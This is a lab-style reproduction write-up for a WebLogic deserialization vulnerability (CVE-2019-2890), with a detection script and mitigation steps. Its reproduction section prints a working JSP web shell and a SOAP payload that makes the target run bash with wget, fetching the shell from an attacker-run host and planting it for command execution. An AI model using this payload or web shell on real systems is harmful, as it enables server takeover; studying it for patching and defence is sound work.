1. Vulnerability introduction
On October 15, 2019, Oracle officially released the October 2019 security update announcement, which contains a high-risk vulnerability that can cause RCE remote arbitrary code execution. The vulnerability number is CVE-2019-2890.
When Weblogic uses the T3 protocol to make remote resource loading calls, it will perform blacklist filtering by default to ensure deserialization security. This vulnerability bypasses Weblogic’s deserialization blacklist, allowing attackers to conduct remote attacks on vulnerable Weblogic components through the T3 protocol. Since the T3 protocol is turned on by default when the Weblogic console is turned on, and the default installation of Weblogic will automatically turn on the console, attackers can use this vulnerability to cause remote code execution to control the Weblogic server.
2. Scope of influence
WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
3. Vulnerability environment construction
Enter the environment directory
Start container
docker-compose up -d
Port query
docker ps -a
4. Vulnerability detection
#author:xcc
import requests
import re
import argparse
headers={
'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
}
def url():
parser = argparse.ArgumentParser(description='WebLogic Deserialization Vulnerability (CVE-2019-2890)POC')
parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:7001')
args = parser.parse_args()
global url
url = args.target_url
print('[ + ]author:xcc')
print('[-]WebLogic deserialization vulnerability (CVE-2019-2890) detection')
print(f'[-]target:{url}')
print('[-]Requesting target address...')
if url.startswith('http://') or url.startswith('https://'):
pass
else:
print('[-]Please include http:// or https:// in the URL!!')
os._exit(0)
def poc():
url_console = url + '/console'
try:
console_text = requests.get(url=url_console,headers=headers).text
ex = '<p id="footerVersion">WebLogic Server .*: (.*?)</p>'
result = re.findall(ex,console_text,re.S)
url_vul = url + "/_async/AsyncResponseService"
r = requests.get(url=url_vul,headers=headers)
version_list = ['12.2.1.3','12.1.3.0','10.3.6.0']
if r.status_code == 200 and "Welcome to the" in r.text and result[0] in version_list:
print('[ + ]Vulnerability exists')
else:
print('[-]The vulnerability does not exist')
except Exception as error:
print('An error occurred: ',error)
if __name__ == '__main__':
url()
poc()
5. Vulnerability recurrence
Visit http://192.168.0.116:7001/_async/AsyncResponseService
Generate shell.txt file locally
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
“);
}
%>
Start the web service on this machine and access it successfully
python -m http.server 12345
Grab the package of http://192.168.0.116:7001/_async/AsyncResponseService page through burp
Modify the package data to the following content
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.0.116:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Connection: close Content-Length: 868 content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy=" http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>wget http://192.168.0.124:12345/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
Successfully sent, showing that the Trojan file has been written to the server
Visit http://192.168.0.116:7001/_async/shell.jsp?pwd=123 &cmd=ls
Get the current directory file
6. Bug fixes
1. Update Oracle 2019 October patch
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
2. Control access to T3 protocol
This vulnerability occurs in WebLogic’s T3 service, so attacks against this vulnerability can be temporarily blocked by controlling access to the T3 protocol. When the WebLogic console port (default port 7001) is opened, the T3 service will be enabled by default. Specific operations:
(1) Enter the WebLogic console, in the base_domain configuration page, enter the “Security” tab page, click “Filter” to enter the connection filter configuration.
(2) Enter in the connection filter: weblogic.security.net.ConnectionFilterImpl, enter in the connection filter rule: 127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * * deny t3 t3s (t3 and t3s protocol All ports allow local access only).
(3) You need to restart after saving for the rules to take effect.